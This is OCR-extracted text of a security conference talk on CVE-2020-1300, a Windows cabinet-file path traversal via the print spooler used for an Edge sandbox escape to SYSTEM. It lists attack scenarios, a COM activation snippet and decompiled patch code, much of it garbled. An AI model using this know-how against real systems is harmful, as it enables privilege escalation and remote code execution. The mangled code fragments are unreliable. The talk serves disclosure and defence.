3712 BA CloseFile 


2 4135 print$x641PCC West cab 
C \Windows\CSC\w2. 0.6\namespace\\192.168.234.135 
C:\Windows\CSC\w2.0.6\namespace\192.168.234.135 
C:\Windows\CSC\w2.0.6\namespace\192.168.234.135 
C:\Windows System 321spool (7A047B18-DFC7-45EB-9A6B-E60831D0E8B5) 
C:\Windows\System32\spool\{7A047B 18-DFC7-45EB-9A6B-E60831DOESB5} 
C:\Windows\System32\spool\{7A047B 18-DFC 7-45EB-9A6B-E60831D0E8B5).cab 
CAWindows'System32'spoolM7A047B18-DFC7-45EB-9A6B-E60831D0E8B5).cab 
CA Windows Spstem32spool V 7A047B18-DFC7-45EB-S9A6B-E60831D0E8B5).cab 
CA Windows Spstem32spool V 7A047B18-DFC7-45EB-SA6B-E60831D0E8B5).cab 
C:NWindows System 321spool 47A047B18-DFC7-45EB-9A6B-E60831D0E8B5).cab 
C:\Windows\System32\spool\{7A047B 18-DFC7-45EB-9A6B-E60831DOESB5}.cab 
C:\Windows \System32\spool\{7A047B 18-DFC7-45EB-9A6B-E60831D0E8B5}.cab 
C:\Windows \System32\spool\{7A047B 18-DFC7-45EB-9A6B-E60831D0E8B5}.cab 
C:\Windows\System32\spool\{7A047B 18-DFC7-45EB-9A6B-E60831DOE8B5}.cab 
C:\Windows \System32\spool\{7A047B 18-DFC7-45EB-SA6B-E60831D0E8B5}.cab 
C:\Window agSvcs\USERENV dil 

C:\Windows \System32\DiagSvcs\USERENV dil 

C:\Windows \System32\DiagSvcs\USERENV dll 

C:\Windows \System32\DiagSvcs\USERENV dll 

C:\Windows \System32\DiagSves\USERENV dil 

C:\Windows \System32\DiagSvcs\USERENV dil 

C:\Windows \System32\DiagSvcs\USERENV dll 

C:\Windows \System32\DiagSvcs\USERENV dil 

C:\Windows \System32\DiagSvcs\USERENV dil 

C:\Windows \System32\DiagSvcs\USERENV dil 

C:\Windows \System32\DiagSvcs\USERENV dil 


What Else Can It Do? 


COM in 60 seconds 
James Forshaw 


Edge is Watching You PWN 


UH OleViewDotNet 64bit 
| File Registry 
ApplDs from І РАС ApplDs from AC 


Fiter - Filter 


CoreDpusSvr 


DataExchangemost 


editionupgradebr 


i | Edge + АС i 
Local Service Credential UI Broker f ^40 CLSIDs i 


OOBE Bio Enrollmert 


| | Edge + [РАС 
OS I 20 CLSIDs 


Wisa Sa ЕЕ b az жэ жэ «в az az = e 


PaymentsSvc 


* SECURITY CONFERENCE 


httos://www.voutube.com/watch?v-dfMuzAZRGm4 


Microsoft Eqge 


° Microsoft Edge renderer process is the most restricted AppContainer 
Sandbox 


e Capability: lpacPrinting 


Microsoft Edge 


AppContainer AppContainer Low Integrity 
Capability SIDs 
e internetClient 
: à * microphone 
Windows Runtime l 
° lpacPrinting 


LowBox Token | AppContainer SID 
Win32 Subsystem 


CPrintTicket WoW Services 
AppContainer 


UH OleView .NET v1.11 - 64bit 
File Registry Object Security Processes Storage Help 


2A81FE91-95D7-487E-BBF8-B... = 
Owner: BUILTIN\Administrators 2A81FE91-95D7-487E-BBF8-B03308E54207 Launch © 
Group:  BUILTINVAdministrators a 
Integrity: Low (NoExecuteUp) > 
DACL SACL 3 
Flags: None E 
ACL Entries 
Type Account Access Flags 


Allowed NAMED CAPABILITIES\Lpac Printing GenericAll None 


Specific Access 
Name Access Mask 
Execute 0x00000001 


[v] Execute Local 0x00000002 
Execute Remote 000000004 
М Activate Local 000000008 
[v] Activate Remote 0х00000010 


Sandbox Escape 


LPrinclicCketservicePrle print ticket; 


CoCreateInstance(CLSID PrintTicket, 
ПИЛГЕ, 
CLSCTX LOCAL SERVER, 
IID PPV ARGS(&print ticket)); 


Sandbox Escape 


CPrintTicketServerBase::Bind GetPrinterDriver 


AppContainer DllHost Spooler 


“” А | 
| NJ CreateFile CreateFile 


Windows OS 


Sandbox Escape Demo 


Patch 


if ( !wcsstr(Str, L"../") && !wcsstr(Str, L"..NN") ) 
| 


714 EX ОЛОБО: 974722 

v22 = -1164; 

v15 = NCabbingLibrary::ProcessCopyFile( 
(NCabbingLibrary *)Str, 


*(const unsigned _ 10516 **) (v14 + 8), 
(const Unsigned 11016 %)%722; 
v13) ; 

operator delete (Str); 

v4 = v22; 

v3[2] = v15; 


return v4; 


win32spl!NCabbingLibrary::FdiCabNotify 


Possible Attack Scenarios 


e Lateral movement 
e Modify a trusted printer 


e Remote code execution 

e Connect to attacker-controlled printer 
e Privilege escalation 

° Make a printer connection attempt 


e NT AUTHORITYASYSTEM for all scenarios 


CVE-2020-1300 


CVE- 2020-1300 | Windows Remote Code Execution Vulnerability 


Security Vulnerability 


| Published: 06/09/2020 


MITRE CVE-2020-1300 


| | | 
A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. 


| I . 
¡To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file 
jor spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver. 


| 
| The update addresses the vulnerability Бу correcting how Windows handles cabinet files. 


Don't Be Panic 


т” 


Extract 
Home Share View Compressed Folder Tools 


VIO >= v6 ) 
break; 


^ 5 > test 


vil = v7[v10] = 47; p) Cu 
il Quick access 9 if ( vll <= 45u ) rp VAS 
B Desktop ( 

J Downloads 


vl2 = “11; 
‘=| Documents 


= v13 = 0х200000000801164; 


d Music 


if ( bittest64(av13, v12) ) 
Ш Videos 


у21 = v9 + 1; 
@® OneDrive ) 


| 710 = ++v9; 
EH This PC ) while vilv9] ); 
p Network 


1 item 1 item selected 104 KB 


cabview!CCabItemList: :AddItem 


Conclusion 


Windows Printing Implementation is complex 


Walk through of CVE-2020-1300 


e Can be exploited both locally and remotely 
e Execute arbitrary code 

e Sandbox Escape 

e NT AUTHORITYNSYSTEM 


For developers, handle the cabinet API callbacks carefully 


Logic bugs are always fun! 
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